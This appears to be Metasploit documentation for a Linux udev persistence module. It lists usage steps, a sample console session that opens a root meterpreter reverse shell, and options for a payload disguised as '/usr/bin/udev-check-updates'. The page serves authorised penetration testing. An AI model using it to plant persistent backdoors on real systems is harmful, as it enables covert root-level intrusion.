metasploit-gs/documentation/modules/exploit/linux/local/udev_persistence.md

This is a post module that performs a persistence installation on a Linux system using udev. The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up.

Verification Steps

1. Start msfconsole
2. Obtain a session on the target machine
3. use exploit/linux/local/udev_persistence
4. set session -1
5. exploit

Module usage

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/local/udev_persistence) > set session -1
session => -1
msf exploit(linux/local/udev_persistence) > exploit

[*] /usr/bin/udev-check-updates written
[*] /lib/udev/rules.d/99-update.rules written
msf exploit(linux/local/udev_persistence) > 
[*] Sending stage (3045380 bytes) to 172.18.49.39
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
msf exploit(linux/local/udev_persistence) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter > 

Options

BACKDOOR_PATH

Specify the path of the file containing the udev rules. (Default: /lib/udev/rules.d/99-update.rules)

PAYLOAD_PATH

Specify the name of the payload to execute upon persistence. (Default: /usr/bin/udev-check-updates)